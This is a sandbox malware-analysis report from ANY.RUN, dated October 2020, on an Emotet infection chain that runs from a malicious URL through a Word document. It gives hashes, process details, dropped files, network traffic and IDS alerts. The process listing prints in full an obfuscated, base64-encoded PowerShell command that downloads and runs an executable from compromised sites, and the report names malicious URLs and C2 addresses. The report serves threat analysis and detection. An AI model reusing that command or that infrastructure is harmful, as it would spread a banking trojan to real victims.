analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://serenitykenya.co.ke/wiremu-kingi/eTrac/624039604382/eobr-91974/

Full analysis: https://app.any.run/tasks/d3131720-c1fd-42f2-b8a9-ecf6d241ee8e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 19, 2020, 23:11:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
trojan
emotet
emotet-doc
Indicators:
MD5:

69B6BB24FB725B080BAF7CD71133E82B

SHA1:

A44FF40D9DDF07B1032E3B9B07BC9AB6FEAA1F92

SHA256:

EF9D209171B4DF4137B9EF1232AB601200C9E075ABA00AFB30ED5BEEB4AEE6F2

SSDEEP:

3:N8Ndud6KMdMKCMbiGwVR7vHX6Kn:2fE6XKKC/GwVRj36Kn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Stwk31v.exe (PID: 3788)
      • USER.exe (PID: 2768)
    • Downloads executable files from the Internet

      • POwersheLL.exe (PID: 3888)
    • Changes the autorun value in the registry

      • USER.exe (PID: 2768)
    • Connects to CnC server

      • USER.exe (PID: 2768)
    • EMOTET was detected

      • USER.exe (PID: 2768)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2472)
      • WINWORD.EXE (PID: 1788)
    • Application launched itself

      • WINWORD.EXE (PID: 1788)
    • Executed via WMI

      • POwersheLL.exe (PID: 3888)
      • Stwk31v.exe (PID: 3788)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 3888)
      • Stwk31v.exe (PID: 3788)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3888)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3888)
    • Starts itself from another location

      • Stwk31v.exe (PID: 3788)
    • Reads Internet Cache Settings

      • USER.exe (PID: 2768)
  • INFO

    • Reads settings of System Certificates

      • iexplore.exe (PID: 3068)
      • iexplore.exe (PID: 2472)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2472)
      • iexplore.exe (PID: 3068)
    • Changes internet zones settings

      • iexplore.exe (PID: 2472)
    • Creates files in the user directory

      • iexplore.exe (PID: 3068)
      • WINWORD.EXE (PID: 1788)
      • iexplore.exe (PID: 2472)
    • Application launched itself

      • iexplore.exe (PID: 2472)
    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 3068)
      • iexplore.exe (PID: 2472)
      • WINWORD.EXE (PID: 1788)
    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 2472)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1788)
      • WINWORD.EXE (PID: 716)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2472)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
7
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe stwk31v.exe #EMOTET user.exe

Process information

PID
CMD
Path
Indicators
Parent process
2472"C:\Program Files\Internet Explorer\iexplore.exe" "https://serenitykenya.co.ke/wiremu-kingi/eTrac/624039604382/eobr-91974/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3068"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2472 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1788"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Form - Oct 20, 2020.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
716"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3888POwersheLL -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUgAnACsAJwBZACcAKQAgACAAKQAgACAAOwAgACAAcwBlAHQALQB2AGEAUgBJAGEAQgBMAGUAIAAgACgAJwByAEYARwAyADUAJwArACcANAAnACkAIAAgACgAIAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAJwArACcAcwBUAEUAJwArACcAbQAnACsAJwAuAG4AJwArACcAZQBUAC4AcwBFAFIAJwArACcAVgBpAEMARQBwAG8AaQBOAFQAJwArACcAbQAnACsAJwBBAE4AYQBnAEUAJwArACcAcgAnACkAIAApADsAIAAgACAAUwBlAFQALQBpAHQAZQBNACAAKAAiAHYAQQAiACsAIgByAGkAQQAiACsAIgBCAGwAZQA6ADQARwBNAHMAIgApACAAKABbAHQAWQBQAGUAXQAoACcAUwBZAFMAVAAnACsAJwBlAE0AJwArACcALgBuAEUAdAAnACsAJwAuAFMAJwArACcARQAnACsAJwBDACcAKwAnAFUAJwArACcAcgBpAHQAWQBQAFIAbwBUAG8AJwArACcAYwBvAGwAVAB5AFAARQAnACkAIAApACAAIAA7ACAAJABXAHUAYQBtADcAagBlAD0AKAAnAFcANwA5AGgAJwArACcAcAAnACsAJwA3AHQAJwApADsAJABJADIAaABmADAAYwB3AD0AJABJADIAMwBkADYAZwB5ACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATABiAHoAeQBmADcAagA7ACQAWgBfAGwAbwBjAGsAawA9ACgAJwBVACcAKwAnAGIAegBoAGQAZwBsACcAKQA7ACAAIAAkAGsAWgBFAFEAbABVADoAOgBDAFIARQBBAHQARQBkAGkAcgBlAEMAVABPAHIAeQAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcATwAnACsAJwBUAGYAVwA5ACcAKwAnAGwAdQAnACsAJwBkAGEAbgBPAFQAZgAnACsAJwBBAHYAJwArACcAZwBxAGsAagAzAE8AJwArACcAVABmACcAKQAgACAALQBjAHIARQBwAEwAYQBjAGUAIAAgACgAWwBDAGgAQQByAF0ANwA5ACsAWwBDAGgAQQByAF0AOAA0ACsAWwBDAGgAQQByAF0AMQAwADIAKQAsAFsAQwBoAEEAcgBdADkAMgApACkAOwAkAEIANwBkAHQAcwB5AG4APQAoACcAWAB6ADcAJwArACcANQB2AHIAZQAnACkAOwAgACAAKABnAGkAIAAgACgAIgB2ACIAKwAiAGEAUgBJAEEAQgBsAGUAOgBSACIAKwAiAGYARwAyADUANAAiACkAIAApAC4AVgBBAEwAdQBFADoAOgBTAGUAYwB1AFIAaQBUAFkAcABSAG8AVABPAEMATwBsACAAPQAgACAAIAAkADQAZwBNAHMAOgA6AHQATABTADEAMgA7ACQAUQA2AGkAcAB1AGUAaQA9ACgAJwBMACcAKwAnAGYAbAA0ACcAKwAnAHIAcQBoACcAKQA7ACQASQA1ADMAegBpAG0AbQAgAD0AIAAoACcAUwB0ACcAKwAnAHcAawAnACsAJwAzADEAdgAnACkAOwAkAFEAeABzAG4AcAByAGEAPQAoACcAWAAxAHYAagA5ADgAJwArACcAdgAnACkAOwAkAFIAYwBjAG0AbgB2AGcAPQAoACcATQB2AGQAJwArACcAYwA3ADYAaAAnACkAOwAkAEoAMAA5AHgAYQBmADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAVwA5AGwAdQBkAGEAbgAnACsAJwB7ADAAfQBBAHYAZwAnACsAJwBxAGsAagAzACcAKwAnAHsAMAAnACsAJwB9ACcAKQAgACAALQBGACAAWwBDAEgAQQBSAF0AOQAyACkAKwAkAEkANQAzAHoAaQBtAG0AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEcAOQA0ADgAdwA2AHgAPQAoACcARABfACcAKwAnADgAMwAnACsAJwA2ADAAbQAnACkAOwAkAEkAYgBjAHUAbwBpADgAPQBuAGUAVwAtAG8AYABCAEoAYABFAEMAVAAgAE4AZQBUAC4AdwBlAGIAQwBsAEkAZQBOAFQAOwAkAEoAdgBtAG0AZgB5ADAAPQAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8ALwAnACsAJwB0AHUAZAAnACsAJwBvAHIAJwArACcAaQBuACcAKwAnAHYAZQAnACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAHIARwAnACsAJwB0AG4AVQBiADUAZgAnACsAJwAvACcAKwAnACoAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwBkAHAALQB3AG8AJwArACcAbQBlACcAKwAnAG4AYgBhACcAKwAnAHMAJwArACcAawBlACcAKwAnAHQALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtACcAKwAnAGkAbgAvACcAKwAnAEwAaQAvACcAKwAnACoAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwBzACcAKwAnAHQAeQBsAGUAZgBpAHgALgBjACcAKwAnAG8ALwAnACsAJwBnAHUAaQBsAGwAbwAnACsAJwB0ACcAKwAnAGkAJwArACcAbgBlAC0AYwAnACsAJwByAG8AJwArACcAcwAnACsAJwBzACcAKwAnAC8AJwArACcAQwAnACsAJwBUAFIATgBPAFEALwAqAGgAdAB0AHAAOgAvAC8AYQByAGQAJwArACcAbwBzAC4AYwBvACcAKwAnAG0ALgBiAHIALwBzAGkAbQAnACsAJwB1AGwAYQBkAG8AcgAvAGIAUABOACcAKwAnAHgALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvAC8AZAByAHQAaABlAHUAJwArACcAcgBlAGwAcAAnACsAJwBsAGEAcwB0AGkAYwBzAHUAJwArACcAcgBnAGUAJwArACcAcgB5AC4AJwArACcAYwBvAG0ALwAnACsAJwBnACcAKwAnAGUAbgAnACsAJwBlAHIAYQBsAG8ALwByAGgAJwArACcAcgBoAGYAbAAnACsAJwB2ADkAJwArACcAMgAvACoAJwArACcAaAB0AHQAcAA6AC8ALwBiAG8AZAB5AGkAbgBuACcAKwAnAG8AdgBhAHQAJwArACcAaQBvAG4AJwArACcALgBjAG8ALgB6ACcAKwAnAGEALwAnACsAJwB3AHAAJwArACcALQBjACcAKwAnAG8AbgB0AGUAbgB0AC8AMgBzAHMAJwArACcASAB2ACcAKwAnAGkALwAqAGgAdAB0AHAAOgAvAC8AJwArACcAbgBvAG0AYQBkAGMAbwAuACcAKwAnAGUAcwAnACsAJwAvAHcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvAE0AdgB3AFYASABDAEcALwAnACkALgBTAFAATABJAFQAKAAkAFkAeQB4ADEAeQBqADkAIAArACAAJABJADIAaABmADAAYwB3ACAAKwAgACQATABjADcANQBuADAAcQApADsAJABOAHoAYQBhAGQAegBsAD0AKAAnAEwAZABoAG4AeQBwACcAKwAnAHYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABQAGcAcABqADkAdwBhACAAaQBuACAAJABKAHYAbQBtAGYAeQAwACkAewB0AHIAeQB7ACQASQBiAGMAdQBvAGkAOAAuAGQAbwB3AG4ATABPAEEAZABGAGkATABlACgAJABQAGcAcABqADkAdwBhACwAIAAkAEoAMAA5AHgAYQBmADIAKQA7ACQARwBrAGUAaABpAHIAaQA9ACgAJwBaADIAJwArACcAcgB1ADAAJwArACcANAB4ACcAKQA7AEkAZgAgACgAKABnAEUAYABUAC0AYABJAFQAZQBNACAAJABKADAAOQB4AGEAZgAyACkALgBsAEUAbgBnAFQAaAAgAC0AZwBlACAAMgA2ADMANAA2ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpAG4AMwAnACsAJwAyAF8AUAByAG8AYwAnACsAJwBlAHMAcwAnACkAKQAuAEMAcgBlAEEAdABlACgAJABKADAAOQB4AGEAZgAyACkAOwAkAFYAagBnADkAbQAxAGoAPQAoACcAVgBrAHYAYgAnACsAJwB2AG4AJwArACcAYgAnACkAOwBiAHIAZQBhAGsAOwAkAEkAdgBjADYAagA2AGIAPQAoACcAWgAnACsAJwBiAG4AaAAyACcAKwAnADYAdwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEANQA2AGcAcAB3ADgAPQAoACcAVwAnACsAJwA1ACcAKwAnAG8AZwB5ADAAcAAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3788C:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exeC:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exe
wmiprvse.exe
User:
admin
Company:
TODO: <Co
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Exit code:
0
Version:
1.0.0.1
2768"C:\Users\admin\AppData\Local\QAGENT\USER.exe"C:\Users\admin\AppData\Local\QAGENT\USER.exe
Stwk31v.exe
User:
admin
Company:
TODO: <Co
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Version:
1.0.0.1
Total events
4 221
Read events
3 268
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
19
Text files
4
Unknown types
7

Dropped files

PID
Process
Filename
Type
3068iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Cab4C40.tmp
MD5:
SHA256:
3068iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Tar4C51.tmp
MD5:
SHA256:
3068iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Form - Oct 20, 2020.doc.m7id5d5.partial
MD5:
SHA256:
2472iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF26855C1E3EC8F14A.TMP
MD5:
SHA256:
2472iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Form - Oct 20, 2020.doc.m7id5d5.partial:Zone.Identifier
MD5:
SHA256:
1788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6314.tmp.cvr
MD5:
SHA256:
1788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_9773BE39-3BF6-44AF-9114-F5F4AF199B14.0\F3C35AB7.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_9773BE39-3BF6-44AF-9114-F5F4AF199B14.0\~DFC784C821D99F25EC.TMP
MD5:
SHA256:
3888POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXZZ6GKEJ1JUR8844OZX.temp
MD5:
SHA256:
3888POwersheLL.exeC:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exe
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
18
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3888
POwersheLL.exe
GET
200
172.67.192.55:80
http://tudorinvest.com/wp-admin/rGtnUb5f/
US
html
4.19 Kb
malicious
3068
iexplore.exe
GET
200
2.16.186.35:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.37 Kb
whitelisted
3888
POwersheLL.exe
GET
200
35.189.10.17:80
http://stylefix.co/guillotine-cross/CTRNOQ/
US
executable
505 Kb
malicious
3068
iexplore.exe
GET
200
2.16.186.11:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.37 Kb
whitelisted
3888
POwersheLL.exe
GET
200
104.28.12.193:80
http://dp-womenbasket.com/wp-admin/Li/
US
html
4.18 Kb
suspicious
2768
USER.exe
POST
177.130.51.198:80
http://177.130.51.198/2iLw7PFYczIWyB/ypdgRi/dduqLlE/
BR
malicious
2768
USER.exe
POST
200
104.131.144.215:8080
http://104.131.144.215:8080/I4MGbIj5BuUpE2E8Sy/
US
binary
132 b
malicious
2768
USER.exe
POST
91.121.87.90:8080
http://91.121.87.90:8080/k3nv/giy10IRqBSbMMEssztv/CX8jweNC7LOYI/
FR
malicious
2472
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
2472
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3068
iexplore.exe
2.16.186.11:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
whitelisted
3068
iexplore.exe
169.239.252.78:443
serenitykenya.co.ke
NODE-AFRICA
KE
suspicious
2768
USER.exe
177.130.51.198:80
Wsp Serviços de Telecomunicações Ltda
BR
malicious
2768
USER.exe
104.131.144.215:8080
Digital Ocean, Inc.
US
malicious
3068
iexplore.exe
2.16.186.35:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
whitelisted
3888
POwersheLL.exe
172.67.192.55:80
tudorinvest.com
US
suspicious
3888
POwersheLL.exe
104.28.12.193:80
dp-womenbasket.com
Cloudflare Inc
US
suspicious
3888
POwersheLL.exe
35.189.10.17:80
stylefix.co
Google Inc.
US
suspicious
2768
USER.exe
91.121.87.90:8080
OVH SAS
FR
malicious
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
serenitykenya.co.ke
  • 169.239.252.78
unknown
isrg.trustid.ocsp.identrust.com
  • 2.16.186.35
  • 2.16.186.11
whitelisted
tudorinvest.com
  • 172.67.192.55
  • 104.24.121.136
  • 104.24.120.136
malicious
dp-womenbasket.com
  • 104.28.12.193
  • 104.28.13.193
  • 172.67.151.128
suspicious
stylefix.co
  • 35.189.10.17
malicious
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
ieonline.microsoft.com
  • 204.79.197.200
whitelisted

Threats

PID
Process
Class
Message
3888
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3888
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3888
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2768
USER.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
3888
POwersheLL.exe
A Network Trojan was detected
AV POLICY CloudFlare Anti-Phishing Protection Warning in HTML Inbound
3888
POwersheLL.exe
A Network Trojan was detected
AV POLICY CloudFlare Anti-Phishing Protection Warning in HTML Inbound
2768
USER.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
2768
USER.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
3 ETPRO signatures available at the full report
No debug info